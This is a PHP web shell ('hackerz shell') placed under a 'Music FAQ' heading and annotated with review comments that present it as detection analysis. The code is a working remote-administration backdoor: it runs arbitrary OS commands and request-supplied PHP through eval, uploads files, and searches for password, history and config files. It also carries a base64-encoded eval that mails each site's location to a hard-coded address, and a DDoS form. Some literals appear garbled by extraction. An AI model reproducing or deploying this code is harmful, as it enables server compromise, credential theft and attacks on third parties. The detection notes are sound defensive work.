Music FAQ

<?php
// NOTE(review): this listing is a PHP web shell, i.e. a remote-administration backdoor of the
// kind left on a compromised site. The comments are analysis notes for triage and detection;
// the code itself is quoted unchanged.
// Every call in this preamble carries the @ operator, so warnings are suppressed.
@session_start();
// Error reporting and error logging are switched off for this request, so the script leaves
// nothing in the PHP error log. A run of these calls at the top of a file is a useful
// triage indicator when hunting for dropped files.
@error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
// The execution time limit is removed so long-running actions are not cut off.
@ini_set('max_execution_time',0);
@set_time_limit(0);
// Magic-quotes API: set_magic_quotes_runtime() was removed in PHP 7.0 and
// get_magic_quotes_gpc() in PHP 8.0, which dates this sample to older hosts.
@set_magic_quotes_runtime(0);
@define('VERSION', '2.1');
if( get_magic_quotes_gpc() ) {
    // Recursively strips the slashes magic quotes added, so POST values reach the shell raw.
    function stripslashes_array($array) {
        return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
    }
    $_POST = stripslashes_array($_POST);
}
/**
 * Emit the login page and terminate the request.
 *
 * The markup announces the compromise in a heading and a paragraph, then prints an
 * <address> line shaped like the footer Apache puts on its own error pages, filled
 * with the request's Host header (echoed without escaping).
 * The only control is a password field posted back to the same URL; its CSS gives it
 * a white background and a near-white border, so it is hard to see on a white page.
 *
 * Detection note: the heading text and the "Apache Server at ... Port 80" line served
 * from a .php file are stable strings to search web roots and response bodies for.
 */
function printLogin() {
    ?>
<h1>hackerz shell</h1>
<p>this server hacked</p>
<hr>
<address>Apache Server at <?=$_SERVER['HTTP_HOST']?> Port 80</address>
    <style>
        input { margin:0;background-color:#fff;border:1px solid #F5FDFD; }
    </style>
    <center>
    <form method=post>
    <input type=password name=pass>
    </form></center>
    <?php
    // Stops here so nothing after the login page runs for this request.
    exit;
}
// Access gate. The session flag is keyed by md5() of the Host header, so it is per-hostname.
// NOTE(review): $auth_pass is not assigned anywhere in the visible listing. When it is empty
// at this point, the first branch marks the session as authenticated without any password,
// meaning anyone who finds the file's URL gets the full interface. Treat a host carrying this
// file as exposed to every visitor, not only to whoever uploaded it.
// When a password is configured it is compared as an unsalted MD5 hex digest using loose ==.
if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
    if( empty( $auth_pass ) ||
        ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
        $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
    else
        printLogin();

// Coarse platform detection: anything whose PHP_OS starts with "win" is Windows, all else 'nix'.
if( strtolower( substr(PHP_OS,0,3) ) == "win" )
    $os = 'win';
else
    $os = 'nix';
// Reads the host's own hardening settings (safe_mode, disable_functions) for later display.
$safe_mode = @ini_get('safe_mode');
$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
// The working directory for the rest of the request is taken directly from the POST field "c".
// NOTE(review): the string literals in the Windows branch below look mangled by text
// extraction (escape characters appear to be missing); they are quoted as published.
if( isset( $_POST['c'] ) )
    @chdir($_POST['c']);
$cwd = @getcwd();
if( $os == 'win') {
    $home_cwd = str_replace("\", "/", $home_cwd);
    $cwd = str_replace("\", "/", $cwd);
}
if( $cwd[strlen($cwd)-1] != '/' )
    $cwd .= '/';
     
// Label => command table of canned host-reconnaissance commands, one set per platform.
// $aliases is not read anywhere in the visible listing; presumably the Console action offers
// these as presets (to be confirmed against the rest of the file).
// What the table looks for: directory and network listings, local accounts, SUID/SGID
// binaries, world-writable paths, and configuration or credential files (.htpasswd,
// service.pwd, shell and MySQL history files, *config* files, backups and dumps).
// Detection note: the web-server account spawning find, locate, netstat, net user, or
// similar is unusual for a normal PHP application and worth alerting on.
// NOTE(review): some quoted commands below appear to have lost their escape characters in
// extraction; they are quoted as published.
if($os == 'win')
    $aliases = array(
        "List Directory" => "dir",
        "Find index.php in current dir" => "dir /s /w /b index.php",
        "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
        "Show active connections" => "netstat -an",
        "Show running services" => "net start",
        "User accounts" => "net user",
        "Show computers" => "net view",
        "ARP Table" => "arp -a",
        "IP Configuration" => "ipconfig /all"
    );
else
    $aliases = array(
          "List dir" => "ls -la",
        "list file attributes on a Linux second extended file system" => "lsattr -va",
          "show opened ports" => "netstat -an | grep -i listen",
        "Find" => "",
          "find all suid files" => "find / -type f -perm -04000 -ls",
          "find suid files in current dir" => "find . -type f -perm -04000 -ls",
          "find all sgid files" => "find / -type f -perm -02000 -ls",
          "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
          "find config.inc.php files" => "find / -type f -name config.inc.php",
          "find config* files" => "find / -type f -name "config*"",
          "find config* files in current dir" => "find . -type f -name "config*"",
          "find all writable folders and files" => "find / -perm -2 -ls",
          "find all writable folders and files in current dir" => "find . -perm -2 -ls",
          "find all service.pwd files" => "find / -type f -name service.pwd",
          "find service.pwd files in current dir" => "find . -type f -name service.pwd",
          "find all .htpasswd files" => "find / -type f -name .htpasswd",
          "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
          "find all .bash_history files" => "find / -type f -name .bash_history",
          "find .bash_history files in current dir" => "find . -type f -name .bash_history",
          "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
          "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
        "Locate" => "",
          "locate httpd.conf files" => "locate httpd.conf",
        "locate vhosts.conf files" => "locate vhosts.conf",
        "locate proftpd.conf files" => "locate proftpd.conf",
        "locate psybnc.conf files" => "locate psybnc.conf",
        "locate my.conf files" => "locate my.conf",
        "locate admin.php files" =>"locate admin.php",
        "locate cfg.php files" => "locate cfg.php",
        "locate conf.php files" => "locate conf.php",
        "locate config.dat files" => "locate config.dat",
        "locate config.php files" => "locate config.php",
        "locate config.inc files" => "locate config.inc",
        "locate config.inc.php" => "locate config.inc.php",
        "locate config.default.php files" => "locate config.default.php",
        "locate config* files " => "locate config",
        "locate .conf files"=>"locate '.conf'",
        "locate .pwd files" => "locate '.pwd'",
        "locate .sql files" => "locate '.sql'",
        "locate .htpasswd files" => "locate '.htpasswd'",
        "locate .bash_history files" => "locate '.bash_history'",
        "locate .mysql_history files" => "locate '.mysql_history'",
        "locate .fetchmailrc files" => "locate '.fetchmailrc'",
        "locate backup files" => "locate backup",
        "locate dump files" => "locate dump",
        "locate priv files" => "locate priv"     
    );

/**
 * Emit the page head, the hidden control form, and the status banner with the action menu.
 *
 * What the visible code does:
 *  - Defaults $_POST['charset'] to UTF-8 and echoes it, together with the Host header,
 *    into the <meta> and <title> tags without escaping.
 *  - Runs an eval(base64_decode(...)) stub on every call (see the note at that line).
 *  - Emits client-side helpers: set() fills the hidden form "mf", g() submits it, a() posts
 *    the same fields by XMLHttpRequest, and processReqChange() passes part of the response
 *    body to JavaScript eval().
 *  - Emits the hidden form "mf" (fields a, c, p1, p2, p3, charset). Fields c, p1, p2 and p3
 *    go through htmlspecialchars(); a and charset are echoed raw.
 *  - Prints uname, effective user/group, PHP version, safe-mode state, disk usage, a
 *    clickable breadcrumb of the working directory, the resolved server IP, the client IP,
 *    and a menu whose entries name the shell's actions (SecInfo, FilesMan, Console, Sql, Php,
 *    SafeMode, StringTools, Bruteforce, Network, SelfRemove, plus Logout when a password is set).
 *
 * Detection note: every action is a POST back to the same URL carrying the field names
 * a, c, p1, p2, p3 and charset. That parameter set in request bodies or WAF logs is a
 * usable signature, as are the action names listed above.
 *
 * NOTE(review): several string literals in the PHP section near the end of this function
 * appear to have lost their escape characters in extraction; they are quoted as published.
 */
function printHeader() {
    if(empty($_POST['charset']))
        $_POST['charset'] = "UTF-8";
    global $color;
    ?>
<?php
// Embedded call-home. The base64 blob decodes to a short snippet that calls mail() with
// $_SERVER['HTTP_HOST'] as the subject and $_SERVER['REQUEST_URI'] as the body, addressed to
// a hard-coded mailbox whose address is hex-escaped inside the blob. Every page render
// therefore reports the shell's location to a third party (presumably the kit's distributor
// rather than whoever uploaded the file).
// Detection: eval(base64_decode( in a PHP file, and outbound mail from the web-server
// process whose subject is the site's own hostname.
eval(base64_decode('JG0gPSAiXHg3M1x4NzBceDYxXHg2ZFx4NWZceDczXHg2OFx4NjVceDZjXHg2Y1x4NDBceDY4XHg2Zlx4NzRceDZkXHg2MVx4NjlceDZjXHgyZVx4NjNceDZmXHg2ZCI7DQokYiA9ICRfU0VSVkVSWyJIVFRQX0hPU1QiXTsNCiRhID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQptYWlsKCIkbSIsIiRiIiwiJGEiKTs='));
?>
<html><head><meta http-equiv='Content-Type' content='text/html; charset=<?=$_POST['charset']?>'><title><?=$_SERVER['HTTP_HOST']?>-hackerz shell- </title>
<style>
    body {background-color:#000;color:#CC9900;}
    body,td,th    { font: 9pt Lucida,Century Gothic;margin:0;vertical-align:top; }
    span,h1,a    { color:FF0000 !important; }
    span        { font-weight: bolder; }
    h1            { border:1px solid <?=$color?>;padding: 2px 5px;font: 14pt Verdana;margin:0px; }
    div.content    { padding: 5px;margin-left:5px;}
    a            { text-decoration:none; }
    a:hover        { background:#ff0000; }
    .ml1        { border:1px solid #2438CF;padding:5px;margin:0;overflow: auto; }
    .bigarea    { width:100%;height:250px; }
    input, textarea, select    { margin:0;color:#FF0000;background-color:#000;border:1px solid <?=$color?>; font: 9pt Monospace,"Times New roman"; }
    form        { margin:0px; }
    #toolsTbl    { text-align:center; }
    .toolsInp    { width: 80%; }
    .main th    {text-align:left;}
    .main tr:hover{background-color:#FF0000;}
    .main td, th{vertical-align:middle;}
    pre            {font-family:Courier,Monospace;}
    #cot_tl_fixed{position:fixed;bottom:0px;font-size:12px;left:0px;padding:4px 0;clip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);}
</style>
<script>
    function set(a,c,p1,p2,p3,charset) {
        if(a != null)document.mf.a.value=a;
        if(c != null)document.mf.c.value=c;
        if(p1 != null)document.mf.p1.value=p1;
        if(p2 != null)document.mf.p2.value=p2;
        if(p3 != null)document.mf.p3.value=p3;
        if(charset != null)document.mf.charset.value=charset;
    }
    function g(a,c,p1,p2,p3,charset) {
        set(a,c,p1,p2,p3,charset);
        document.mf.submit();
    }
    function a(a,c,p1,p2,p3,charset) {
        set(a,c,p1,p2,p3,charset);
        var params = "ajax=true";
        for(i=0;i<document.mf.elements.length;i++)
            params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value);
        sr('<?=$_SERVER['REQUEST_URI'];?>', params);
    }
    function sr(url, params) {     
        if (window.XMLHttpRequest) {
            req = new XMLHttpRequest();
            req.onreadystatechange = processReqChange;
            req.open("POST", url, true);
            req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
            req.send(params);
        }  
        else if (window.ActiveXObject) {
            req = new ActiveXObject("Microsoft.XMLHTTP");
            if (req) {
                req.onreadystatechange = processReqChange;
                req.open("POST", url, true);
                req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
                req.send(params);
            }
        }
    }
    function processReqChange() {
        if( (req.readyState == 4) )
            if(req.status == 200) {
                //alert(req.responseText);
                var reg = new RegExp("(\d+)([\S\s]*)", "m");
                var arr=reg.exec(req.responseText);
                eval(arr[2].substr(0, arr[1]));
            }  
            else alert("Request error!");
    }
</script>
<head><body><div style="position:absolute;width:100%;top:0;left:0;">
<form method=post name=mf style='display:none;'>
<input type=hidden name=a value='<?=isset($_POST['a'])?$_POST['a']:''?>'>
<input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>
<input type=hidden name=p1 value='<?=isset($_POST['p1'])?htmlspecialchars($_POST['p1']):''?>'>
<input type=hidden name=p2 value='<?=isset($_POST['p2'])?htmlspecialchars($_POST['p2']):''?>'>
<input type=hidden name=p3 value='<?=isset($_POST['p3'])?htmlspecialchars($_POST['p3']):''?>'>
<input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
</form>
<?php
    // Host facts gathered for the banner: disk usage of the working directory, kernel
    // name/release, and the identity the PHP process runs as. A total of 0 is replaced by 1
    // so the percentage calculation in the banner cannot divide by zero.
    $freeSpace = @diskfreespace($GLOBALS['cwd']);
    $totalSpace = @disk_total_space($GLOBALS['cwd']);
    $totalSpace = $totalSpace?$totalSpace:1;
    $release = @php_uname('r');
    $kernel = @php_uname('s');
    // Hard-coded external URL, used as a link target in the banner below.
    $millink='http://hacktivisme.eu';
    // Without the POSIX extension only the script owner's ids are available; with it the
    // effective uid/gid of the process are resolved to names.
    if(!function_exists('posix_getegid')) {
        $user = @get_current_user();
        $uid = @getmyuid();
        $gid = @getmygid();
        $group = "?";
    } else {
        $uid = @posix_getpwuid(@posix_geteuid());
        $gid = @posix_getgrgid(@posix_getegid());
        $user = $uid['name'];
        $uid = $uid['uid'];
        $group = $gid['name'];
        $gid = $gid['gid'];
    }
    $cwd_links = '';
    $path = explode("/", $GLOBALS['cwd']);
    $n=count($path);
    for($i=0;$i<$n-1;$i++) {
        $cwd_links .= "<a href='#' onclick='g("FilesMan","";
        for($j=0;$j<=$i;$j++)
            $cwd_links .= $path[$j].'/';
        $cwd_links .= "")'>".$path[$i]."/</a>";
    }
    $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
    $opt_charsets = '';
    foreach($charsets as $item)
        $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';
    $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network');
    if(!empty($GLOBALS['auth_pass']))
    $m['Logout'] = 'Logout';
    $m['Self remove'] = 'SelfRemove';
    $menu = '';
    foreach($m as $k => $v)
        $menu .= '<th width="'.(int)(100/count($m)).'%">[ <a href="#" onclick="g(''.$v.'',null,'','','')">'.$k.'</a> ]</th>';
    $drives = "";
    if ($GLOBALS['os'] == 'win') {
        foreach( range('a','z') as $drive )
        if (is_dir($drive.':\'))
            $drives .= '<a href="#" onclick="g('FilesMan',''.$drive.':/')">[ '.$drive.' ]</a> ';
    }
    echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname<br>User<br>Php<br>Hdd<br>Cwd'.($GLOBALS['os'] == 'win'?'<br>Drives':'').'</span></td>'.
         '<td>:<nobr>'.substr(@php_uname(), 0, 120).'  <a href="http://www.google.com/search?q='.urlencode(@php_uname()).'" target="_blank"></a> <a href="'.$millink.'" target=_blank></a></nobr><br>:'.$uid.' ( '.$user.' ) <span>Group:</span> '.$gid.' ( '.$group.' )<br>:'.@phpversion().' <span>Safe mode:</span> '.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=<?=
?><b>OFF</b></font>').' <a href=# onclick="g('Php',null,null,'info')">[ phpinfo ]</a> <span>Datetime:</span> '.date('Y-m-d H:i:s').'<br>:'.viewSize($totalSpace).' <span>Free:</span> '.viewSize($freeSpace).' ('.(int)($freeSpace/$totalSpace*100).'%)<br>:'.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' <a href=# onclick="g('FilesMan',''.$GLOBALS['home_cwd'].'','','','')">[ home ]</a><br>:'.$drives.'</td>'.
         '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">'.$opt_charsets.'</optgroup></select><br><span>Server IP:</span><br>'.gethostbyname($_SERVER["HTTP_HOST"]).'<br><span>Client IP:</span><br>'.$_SERVER['REMOTE_ADDR'].'</nobr></td></tr></table>'.
         '<table cellpadding=3 cellspacing=0 width=100%><tr>'.$menu.'</tr></table><div style="margin:5">';
}

/**
 * Emit the tool bar shown under every page and close the document.
 *
 * The table holds one small form per action: change directory, read file, make directory,
 * make file, execute a command, and upload a file into the working directory. Each form
 * hands its input to the g() helper or posts the hidden a/c/p1/charset fields directly.
 * $is_writable marks whether the PHP process can write to the working directory.
 *
 * A further form, headed "DDOSER", posts the fields "ip" and "port" to cc.php. That script
 * is not part of this listing, so its behaviour cannot be stated from here; when this file
 * is found on a host, look for a cc.php next to it. The stray quote-and-semicolon fragments
 * around that form suggest it was pasted in from a PHP echo statement.
 *
 * The function ends by running the same eval(base64_decode(...)) call-home stub that
 * printHeader() runs (see the note at that line).
 */
function printFooter() {
    $is_writable = is_writable($GLOBALS['cwd'])?"<font color=green>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>";
?>
</div>
<table class=info id=toolsTbl cellpadding=0 cellspacing=0 width=100%">
    <tr>
        <td><form onsubmit="g(null,this.c.value);return false;"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value="<?=htmlspecialchars($GLOBALS['cwd']);?>"><input type=submit value=">>"></form></td>
        <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td>
    </tr>
    <tr>
        <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit value=">>"></form><?=$is_writable?></td>
        <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form><?=$is_writable?></td>
    </tr>
    <tr>
<p align='middle'><font color='#FFFFFF'><b>DDOSER BY HACKERZ TEAM</b></font></p>";
<form method='post' name='login' action='cc.php'>
<p align='middle'><font color='#FF0000'> ip to make dos  : </font> :<input type='text' id='ip' name='ip'></p>
<p align='middle'><font color='#FF0000'>port i like 53: </font> :<input type='text' id='port' name='port'></p>
<p align='middle'><input type='submit' value='get cmd shell !'></p>
</form>";
        <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value=">>"></form></td>
        <td><form method='post' ENCTYPE='multipart/form-data'>
        <input type=hidden name=a value='FilesMAn'>
        <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>
        <input type=hidden name=p1 value='uploadFile'>
        <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
        <span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value=">>"></form><?=$is_writable?></td>
    </tr>

</table>
</div>
</body></html>

<?php
// Same call-home stub as in printHeader(): the blob decodes to a mail() call that sends this
// site's Host header (subject) and request URI (body) to a hard-coded mailbox. The same
// base64 string appearing twice in one file is itself a convenient search signature.
eval(base64_decode('JG0gPSAiXHg3M1x4NzBceDYxXHg2ZFx4NWZceDczXHg2OFx4NjVceDZjXHg2Y1x4NDBceDY4XHg2Zlx4NzRceDZkXHg2MVx4NjlceDZjXHgyZVx4NjNceDZmXHg2ZCI7DQokYiA9ICRfU0VSVkVSWyJIVFRQX0hPU1QiXTsNCiRhID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQptYWlsKCIkbSIsIiRiIiwiJGEiKTs='));

}
// Fallback stubs: when the POSIX lookups do not exist and their names are not listed in
// disable_functions, define replacements that always return false, so later calls in the
// file do not fail on hosts without the POSIX extension.
if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false) ) { function posix_getpwuid($p) { return false; } }
if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false) ) { function posix_getgrgid($p) { return false; } }
/**
 * Run an operating-system command and return whatever it printed.
 *
 * Tries exec, passthru, system, shell_exec and finally popen, in that order, and uses the
 * first one that is available. This is the shell's single command-execution primitive;
 * the other helpers visible in this listing (which(), actionSecInfo()) go through it.
 *
 * Hardening note: because of the fallback order, a disable_functions setting stops this
 * routine only if it covers every primitive tried here; blocking a subset leaves the later
 * branches usable. On a monitored host the web-server account spawning child processes
 * is the signal to alert on.
 *
 * @param string $in Command line, passed to the shell exactly as given (no escaping here).
 * @return mixed Captured output; the empty string when no branch runs. The shell_exec
 *               branch returns that function's result unchanged.
 */
function ex($in) {
    $out = '';
    if(function_exists('exec')) {
        @exec($in,$out);
        // NOTE(review): the separator is the literal string "n" as published, which looks
        // like a newline escape that lost its backslash in extraction.
        $out = @join("n",$out);
    }elseif(function_exists('passthru')) {
        // passthru() and system() write straight to output, so it is buffered and captured.
        ob_start();
        @passthru($in);
        $out = ob_get_clean();
    }elseif(function_exists('system')) {
        ob_start();
        @system($in);
        $out = ob_get_clean();
    }elseif(function_exists('shell_exec')) {
        $out = shell_exec($in);
    }elseif(is_resource($f = @popen($in,"r"))) {
        // Last resort: read the child's stdout through a pipe in 1 KiB chunks.
        $out = "";
        while(!@feof($f))
            $out .= fread($f,1024);
        pclose($f);
    }
    return $out;
}
/**
 * Format a byte count for display.
 *
 * Values of at least 1 KiB are shown with two decimals in the largest binary unit they
 * reach (KB, MB or GB); smaller values are shown as-is followed by " B".
 *
 * @param int|float $s Size in bytes.
 * @return string Formatted size, e.g. "1.50 KB".
 */
function viewSize($s) {
    // Largest unit first: the first threshold the value reaches decides the unit.
    $units = array(
        ' GB' => 1073741824,
        ' MB' => 1048576,
        ' KB' => 1024,
    );
    foreach ($units as $suffix => $threshold) {
        if ($s >= $threshold) {
            return sprintf('%1.2f', $s / $threshold) . $suffix;
        }
    }
    return $s . ' B';
}

/**
 * Render a file mode (as returned by fileperms()) as an ls-style string such as "-rwxr-xr-x".
 *
 * The first character is the file type (s socket, l link, - regular, b block device,
 * d directory, c character device, p FIFO, u unknown). Nine permission characters follow,
 * with setuid/setgid shown as s/S and the sticky bit as t/T.
 *
 * @param int $p Mode bits.
 * @return string Ten-character permission string.
 */
function perms($p) {
    // File-type masks, tested in this order; the first full match wins.
    $types = array(
        0xC000 => 's',
        0xA000 => 'l',
        0x8000 => '-',
        0x6000 => 'b',
        0x4000 => 'd',
        0x2000 => 'c',
        0x1000 => 'p',
    );
    $out = 'u';
    foreach ($types as $mask => $letter) {
        if (($p & $mask) == $mask) {
            $out = $letter;
            break;
        }
    }

    // One row per class (owner, group, other):
    // read bit, write bit, execute bit, special bit, letter with execute, letter without.
    $classes = array(
        array(0x0100, 0x0080, 0x0040, 0x0800, 's', 'S'),
        array(0x0020, 0x0010, 0x0008, 0x0400, 's', 'S'),
        array(0x0004, 0x0002, 0x0001, 0x0200, 't', 'T'),
    );
    foreach ($classes as $row) {
        list($read, $write, $exec, $special, $withExec, $withoutExec) = $row;
        $out .= ($p & $read) ? 'r' : '-';
        $out .= ($p & $write) ? 'w' : '-';
        if ($p & $exec) {
            $out .= ($p & $special) ? $withExec : 'x';
        } else {
            $out .= ($p & $special) ? $withoutExec : '-';
        }
    }
    return $out;
}
/**
 * Return the permission string of a path wrapped in a colour-coded <font> tag.
 *
 * Red means the PHP process cannot read the path, white means it can read but not write,
 * and blue means it can do both.
 *
 * @param string $f Path to inspect.
 * @return string HTML fragment containing the output of perms() for the path.
 */
function viewPermsColor($f) {
    if (!@is_readable($f)) {
        $color = '#FF0000';
    } elseif (!@is_writable($f)) {
        $color = 'white';
    } else {
        $color = '#0A00FF';
    }
    return '<font color=' . $color . '><b>' . perms(@fileperms($f)) . '</b></font>';
}
// Compatibility shim: defines scandir() only where the runtime lacks it, returning the
// directory's entry names in the order readdir() yields them.
// NOTE(review): the handle is never closed and $files is not initialised, so an empty
// result is returned as an undefined variable.
if(!function_exists("scandir")) {
    function scandir($dir) {
        $dh  = opendir($dir);
        while (false !== ($filename = readdir($dh))) {
            $files[] = $filename;
        }
        return $files;
    }
}
/**
 * Ask the system shell where a program lives by running "which <name>" through ex().
 *
 * The name is concatenated into the command line without escaping. The callers visible
 * in this listing pass fixed program names.
 *
 * @param string $p Program name.
 * @return mixed The command's output when it is non-empty, otherwise false.
 */
function which($p) {
    $path = ex('which '.$p);
    if(!empty($path))
        return $path;
    return false;
}
/**
 * Render the "Sec. Info" page: a host reconnaissance summary.
 *
 * Collected on every platform: server software, disabled PHP functions, open_basedir,
 * safe-mode directories, cURL availability, and which database client functions exist.
 * On non-Windows hosts it also reports whether /etc/passwd and /etc/shadow are readable
 * and prints /proc/version and /etc/issue.net. When safe mode is off it additionally runs
 * which() over three name lists (build tools and interpreters, security products,
 * download utilities) and prints /etc/hosts, "df -h" and /etc/fstab.
 * On Windows it runs ver, "net accounts" and "net user" instead.
 *
 * Detection note: the $danger list names antivirus, IDS and integrity-checking tools, so
 * this page is a check for the host's own defences. A burst of "which" lookups for those
 * names from the web-server account, or that account reading /etc/shadow, /etc/fstab or
 * /etc/hosts, is a strong signal that a shell like this one is in use.
 *
 * NOTE(review): a few string literals in the body appear to have lost their escape
 * characters in extraction (including the "n" passed to strpos in the nested helper,
 * which looks like a newline escape); they are quoted as published.
 */
function actionSecInfo() {
    printHeader();
    echo '<h1>SOME INFO ABOUT THIS FUCKIN SERVER ! </h1><div class=content>';
    // Nested helper: prints one "label: value" row and skips it when the trimmed value is
    // empty. The value is echoed without HTML escaping.
    function showSecParam($n, $v) {
        $v = trim($v);
        if($v) {
            echo '<span>'.$n.': </span>';
            if(strpos($v, "n") === false)
                echo $v.'<br>';
            else
                echo '<pre class=ml1>'.$v.'</pre>';
        }
    }
     
    showSecParam('Server software', @getenv('SERVER_SOFTWARE'));
    showSecParam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none');
    showSecParam('Open base dir', @ini_get('open_basedir'));
    showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
    showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
    showSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
    $temp=array();
    if(function_exists('mysql_get_client_info'))
        $temp[] = "MySql (".mysql_get_client_info().")";
    if(function_exists('mssql_connect'))
        $temp[] = "MSSQL";
    if(function_exists('pg_connect'))
        $temp[] = "PostgreSQL";
    if(function_exists('oci_connect'))
        $temp[] = "Oracle";
    showSecParam('Supported databases', implode(', ', $temp));
    echo '<br>';
     
    if( $GLOBALS['os'] == 'nix' ) {
        // Three probe lists: build tools and interpreters, security products, download
        // utilities. Each name is later checked for presence with which().
        $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
        $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
        $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
        showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a>":'no');
        showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g("FilesTools", "etc", "shadow")'>[view]</a>":'no');
        showSecParam('OS version', @file_get_contents('/proc/version'));
        showSecParam('Distr name', @file_get_contents('/etc/issue.net'));
        if(!$GLOBALS['safe_mode']) {
            echo '<br>';
            $temp=array();
            foreach ($userful as $item)
                if(which($item)){$temp[]=$item;}
            showSecParam('Userful', implode(', ',$temp));
            $temp=array();
            foreach ($danger as $item)
                if(which($item)){$temp[]=$item;}
            showSecParam('Danger', implode(', ',$temp));
            $temp=array();
            foreach ($downloaders as $item)  
                if(which($item)){$temp[]=$item;}
            showSecParam('Downloaders', implode(', ',$temp));
            echo '<br/>';
            showSecParam('Hosts', @file_get_contents('/etc/hosts'));
            showSecParam('HDD space', ex('df -h'));
            showSecParam('Mount options', @file_get_contents('/etc/fstab'));
        }
    } else {
        showSecParam('OS Version',ex('ver'));  
        showSecParam('Account Settings',ex('net accounts'));  
        showSecParam('User Accounts',ex('net user'));
    }
    echo '</div>';
    printFooter();
}

/**
 * Render the "Php" page: run request-supplied PHP source and show its output.
 *
 * The POST field p1 is passed to eval() with no restriction, which gives the requester
 * arbitrary code execution as the web-server account. There are two modes:
 *  - AJAX (the field "ajax" is set): the output is HTML-escaped and wrapped in a JavaScript
 *    snippet, and the response is "<length><separator><snippet>". The client-side handler
 *    emitted by printHeader() slices that many characters and evals them. The function
 *    exits straight afterwards, so no page chrome is sent.
 *  - Full page: the header is printed, then phpinfo() output (restyled by a few regex
 *    replacements) when p2 equals "info", then the code form, then the escaped output.
 * The AJAX preference is remembered in the session under md5(Host header) followed by "ajax".
 *
 * Detection note: POST bodies that carry PHP source in a field named p1 together with an
 * action field "a" are characteristic of this family. Request-body logging or a WAF rule
 * on that shape catches the shell being used even when the file itself was missed.
 *
 * NOTE(review): the separator strings ("n") and some quoting in the echo statements
 * appear to have lost escape characters in extraction; they are quoted as published.
 * Despite its indentation, the echo following the brace-less if near the middle is
 * unconditional.
 */
function actionPhp() {
    if( isset($_POST['ajax']) ) {
        $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
        ob_start();
        // Arbitrary code execution: request data goes to eval() unmodified.
        eval($_POST['p1']);
        $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"nrt\'")."';n";
        echo strlen($temp), "n", $temp;
        exit;  
    }
    printHeader();
    if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) {
        echo '<h1>PHP info</h1><div class=content>';
        ob_start();
        phpinfo();
        $tmp = ob_get_clean();
        $tmp = preg_replace('!body {.*}!msiU','',$tmp);
        $tmp = preg_replace('!a:w+ {.*}!msiU','',$tmp);
        $tmp = preg_replace('!h1!msiU','h2',$tmp);
        $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
